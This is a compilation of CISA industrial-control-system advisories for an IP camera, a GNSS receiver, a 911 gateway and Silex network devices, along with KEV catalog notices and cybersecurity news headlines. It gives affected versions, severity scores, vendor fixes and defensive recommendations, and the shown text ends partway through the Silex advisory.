This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Hangzhou Xiongmai Technology Co., Ltd XM530 IP Camera

Summary

Successful exploitation of this vulnerability could allow an attacker to bypass authentication and have remote access to sensitive information on the device.

The following versions of Hangzhou Xiongmai Technology Co., Ltd XM530 IP Camera are affected:
- IP Camera XM530V200_X6-WEQ_8M firmware V5.00.R02.000807D8.10010.346624.S.ONVIF_21.06 (CVE-2025-65856)

CVSS v3: 9.8
Vendor: Hangzhou Xiongmai Technology Co., Ltd
Equipment: XM530 IP Camera
Vulnerabilities: Missing Authentication for Critical Function

Background

Critical Infrastructure Sectors: Commercial Facilities
Countries/Areas Deployed: Worldwide
Company Headquarters Location: China

Vulnerabilities

CVE-2025-65856: Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access.

Affected Products

Hangzhou Xiongmai Technology Co., Ltd XM530 IP Camera
- Vendor: Hangzhou Xiongmai Technology Co., Ltd
- Product Version: IP Camera XM530V200_X6-WEQ_8M firmware V5.00.R02.000807D8.10010.346624.S.ONVIF_21.06
- Product Status: known_affected

Remediations

Mitigation: Hangzhou Xiongmai Technology Co., Ltd has not responded to requests to work with CISA to mitigate this vulnerability. Users of affected versions of XM530 IP cameras are invited to contact Xiongmai Technology customer support for additional information (https://www.xiongmaitech.com/en/index.php/about/contact/42).

Relevant CWE: CWE-306 Missing Authentication for Critical Function

Metrics

CVSS Version: 3.1
Base Score: 9.8
Base Severity: CRITICAL
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments

CISA discovered a public Proof of Concept (PoC) authored by Luis Miranda Acebedo and reported it to MITRE.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History

Initial Release Date: 2026-04-23
- Revision 1 (2026-04-23): Initial Publication

Carlson Software VASCO-B GNSS Receiver

Summary

Successful exploitation of this vulnerability could enable a remote attacker to alter critical system functions or disrupt device operation.

The following versions of Carlson Software VASCO-B GNSS Receiver are affected:
- VASCO-B GNSS Receiver <1.4.0 (CVE-2026-3893)

CVSS v3: 9.4
Vendor: Carlson Software
Equipment: VASCO-B GNSS Receiver
Vulnerabilities: Missing Authentication for Critical Function

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2026-3893: The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

Affected Products

Carlson Software VASCO-B GNSS Receiver
- Vendor: Carlson Software
- Product Version: Carlson Software VASCO-B GNSS Receiver: <1.4.0
- Product Status: known_affected

Remediations

Mitigation: Carlson Software recommends users update to Version 1.4.0 or greater. For more information contact Carlson Software (https://www.carlsonsw.com/support-and-training/).

Relevant CWE: CWE-306 Missing Authentication for Critical Function

Metrics

CVSS Version: 3.1
Base Score: 9.4
Base Severity: CRITICAL
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Acknowledgments

Souvik Kandar reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History

Initial Release Date: 2026-04-23
- Revision 1 (2026-04-23): Initial Publication

Intrado 911 Emergency Gateway (EGW)

Summary

Successful exploitation of this vulnerability could allow an attacker to read, modify, or delete files.

The following versions of Intrado 911 Emergency Gateway (EGW) are affected:
- Emergency Gateway 7.x (CVE-2026-6074)
- Emergency Gateway 6.x (CVE-2026-6074)
- Emergency Gateway 5.x (CVE-2026-6074)

CVSS v3: 9.8
Vendor: Intrado
Equipment: 911 Emergency Gateway (EGW)
Vulnerabilities: Path Traversal: '.../...//'

Background

Critical Infrastructure Sectors: Emergency Services
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2026-6074: A path traversal condition in Intrado 911 Emergency Gateway could allow an attacker with existing network access to reach the EGW management interface without authentication. Successful exploitation of this vulnerability could allow a user to read, modify, or delete files.

Affected Products

Intrado 911 Emergency Gateway (EGW)
- Vendor: Intrado
- Product Version: Intrado Emergency Gateway: 7.x, 6.x, 5.x
- Product Status: known_affected

Remediations

Mitigation: Intrado developed and released a software update on March 2nd, 2026, that addresses this issue and has contacted customers to coordinate applying the patch.

Mitigation: If you have questions, contact Intrado E911 Support: E911Support@intrado.com.

Relevant CWE: CWE-35 Path Traversal: '.../...//'

Metrics

CVSS Version: 3.1
Base Score: 9.8
Base Severity: CRITICAL
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments

An anonymous source reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History

Initial Release Date: 2026-04-23
- Revision 1 (2026-04-23): Initial Publication

'Zealot' Shows What AI's Capable of in Staged Cloud Attack

The proof of concept revealed AI-based attacks unfold too fast for human defenders to respond, and that AI evinced more autonomous behavior than expected.

Africa Relinquishes Cyberattack Lead to Latin America — For Now

The volume of cyberattacks targeting Africa declined in the past year, with weekly attacks down 22%, as attackers seemingly shifted their focus to other regions.

Phishing, deepfakes, supply chain attacks to fuel 2026's biggest crypto hacks: CertiK

CertiK has urged crypto users not to overlook basic security practices as major crypto hacks spiked in April.

'The Gentlemen' Rapidly Rises to Ransomware Prominence

Not nearly as polite as the name suggests, the ransomware gang has impressed researchers with its speed in scaling up operations — and its sophistication.

New Mirai campaign exploits RCE flaw in EoL D-Link routers

A new Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection vulnerability affecting D-Link DIR-823X routers, to enlist devices into the botnet. [...]

France confirms data breach at government agency that manages citizens’ IDs

The French government agency that issues and manages national IDs, passports, and other documents announced that hackers stole the personal information of an unspecified number of citizens.

Kyber ransomware gang toys with post-quantum encryption on Windows

A new Kyber ransomware operation is targeting Windows systems and VMware ESXi endpoints in recent attacks, with one variant implementing Kyber1024 post-quantum encryption. [...]

DPRK Fake Job Scams Self-Propagate in 'Contagious Interview'

A compromised developer's repository serves as a worm-like infection vector to spread remote access Trojans (RATs) and other malware.

Electricity Is a Growing Area of Cyber-Risk

IT has long been concerned with ensuring systems receive the right amount of electricity. Cyberattackers are realizing they can manipulate voltage fluctuations for their purposes, too.

Lazarus-linked macOS malware hits crypto and fintech firms

Security researchers linked a new “Mach-O Man” malware kit to a Lazarus campaign that uses fake meeting invites and ClickFix prompts to steal credentials and access corporate systems on macOS.

Aave deposits fall by $15B as Kelp exploit sparks flight from DeFi lender

Aave’s supplied balance has tanked since the Kelp DAO bridge exploit, as users pull funds amid uncertainty over how much of the rsETH-linked shortfall the protocol will ultimately absorb.

New npm supply-chain attack self-spreads to steal auth tokens

A new supply chain attack targeting the Node Package Manager (npm) ecosystem is stealing developer credentials and attempting to spread through packages published from compromised accounts. [...]

North Korea tied to heists worth $578M in April after Kelp DAO exploit

DPRK-linked crypto theft topped $578M in April after the Kelp DAO exploit, as attacks continue to expand across protocols, companies and end users.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation:

CVE-2026-33825 Microsoft Defender Insufficient Granularity of Access Control Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

New GoGra malware for Linux uses Microsoft Graph API for comms

A Linux variant of the GoGra backdoor uses legitimate Microsoft infrastructure, relying on an Outlook inbox for stealthy payload delivery. [...]

Another DeFi protocol hacked as Sui-based Volo hit by $3.5M exploit

Volo Protocol has confirmed a $3.5 million exploit affecting select vaults, adding that it has frozen assets and started fund recovery efforts amid ongoing investigation.

Microsoft releases emergency patches for critical ASP.NET flaw

Microsoft has released out-of-band (OOB) security updates to patch a critical ASP.NET Core privilege escalation vulnerability. [...]

Over 1,300 Microsoft SharePoint servers vulnerable to spoofing attacks

Over 1,300 Microsoft SharePoint servers exposed online remain unpatched against a spoofing vulnerability that was exploited as a zero-day and is still being abused in ongoing attacks. [...]

French govt agency confirms breach as hacker offers to sell data

France Titres, the French government agency responsible for issuing and managing administrative documents, has disclosed a data breach after a threat actor claimed responsibility for the attack and the theft of citizen data. [...]

Ransomware Negotiator Pleads Guilty to BlackCat Scheme

A cautionary tale illustrates why the person negotiating should never be involved with any part of the ransom payment process.

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.

Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Mozilla Thunderbird is an email client. Mozilla Thunderbird ESR is a version of the email client intended to be deployed in large organizations.

Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Exploits Turn Windows Defender Into Attacker Tool

Three proof-of-concept exploits are being used in active attacks against Microsoft's built-in security platform; two are unpatched.

New Lotus data wiper used against Venezuelan energy, utility firms

A previously undocumented data-wiping malware dubbed Lotus was used last year in targeted attacks against energy and utilities organizations in Venezuela. [...]

Surge in Bomgar RMM Exploitation Demonstrates Supply Chain Risk

The critical remote code execution flaw (CVE-2026-1731) in the remote monitoring and management tool can be exploited to spread ransomware and compromise supply chains.

Google Fixes Critical RCE Flaw in AI-Based 'Antigravity' Tool

The prompt-injection vulnerability in the agentic AI product for filesystem operations was a sanitization issue that allowed for sandbox escape and arbitrary code execution.

‘Scattered Spider’ Member ‘Tylerb’ Pleads Guilty

A 24-year-old British national and senior member of the cybercrime group "Scattered Spider" has pleaded guilty to wire fraud conspiracy and aggravated identity theft. Tyler Robert Buchanan admitted his role in a series of text-message phishing attacks in the summer of 2022 that allowed the group to hack into at least a dozen major technology companies and steal tens of millions of dollars worth of cryptocurrency from investors.

0
Silex Technology SD-330AC and AMC Manager

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code, cause a denial-of-service, or configuration information may be altered without authentication. The following versions of Silex Technology SD-330AC and AMC Manager are affected: SD-330AC <=1.42 (CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, CVE-2026-32958, CVE-2015-5621, CVE-2026-32959, CVE-2026-32960, CVE-2026-32961, CVE-2026-32962, CVE-2024-24487, CVE-2026-32963, CVE-2026-32964, CVE-2026-32965) AMC Manager <=5.0.2 (CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, CVE-2026-32958, CVE-2015-5621, CVE-2026-32959, CVE-2026-32960, CVE-2026-32961, CVE-2026-32962, CVE-2024-24487, CVE-2026-32963, CVE-2026-32964, CVE-2026-32965) CVSS Vendor Equipment Vulnerabilities v3 9.8 Silex Technology Silex Technology SD-330AC and AMC Manager Stack-based Buffer Overflow, Heap-based Buffer Overflow, Missing Authentication for Critical Function, Use of Hard-coded Cryptographic Key, Dependency on Vulnerable Third-Party Component, Use of a Broken or Risky Cryptographic Algorithm, Sensitive Information in Resource Not Removed Before Reuse, Incorrect Privilege Assignment, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Neutralization of CRLF Sequences ('CRLF Injection'), Initialization of a Resource with an Insecure Default Background Critical Infrastructure Sectors: Information Technology Countries/Areas Deployed: Worldwide Company Headquarters Location: Japan Vulnerabilities Expand All + CVE-2026-32955 A Stack-based Buffer Overflow vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to execute arbitrary code on the device. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2026-32956 A Heap-based Buffer Overflow vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to execute arbitrary code on the device. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-32957 A Missing Authentication for Critical Function vulnerability in Silex Technology SD-330AC and AMC Manager could allow uploads of arbitrary files to the device without authentication. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2026-32958 A Use of Hard-coded Cryptographic Key vulnerability in Silex Technology SD-330AC and AMC Manager could cause an administrative user to be directed to apply a fake firmware update. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32958 and CVE-2026-32965: Set a password for the settings web interface. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-321 Use of Hard-coded Cryptographic Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N CVE-2015-5621 The snmp_pdu_parse function in snmp_api.c in net-snmp 5.7.2 and earlier does not remove the varBind variable in a netsnmp_variable_list item when parsing of the SNMP PDU fails, which allows remote attackers to cause a denial of service (crash). 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2015-5621: Disable SNMP service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-1395 Dependency on Vulnerable Third-Party Component Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-32959 A Use of a Broken or Risky Cryptographic Algorithm vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to retrieve information via a man-in-the-middle attack. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-327 Use of a Broken or Risky Cryptographic Algorithm Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-32960 A Sensitive Information in Resource Not Removed Before Reuse vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to send specially crafted packets that may allow the attacker to login to the device. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-226 Sensitive Information in Resource Not Removed Before Reuse Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N CVE-2026-32961 A Heap-based Buffer Overflow vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to send specially crafted packets that may cause a temporary denial-of-service (DoS) condition. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2026-32962 A Missing Authentication for Critical Function vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to alter the device configuration without authentication. 
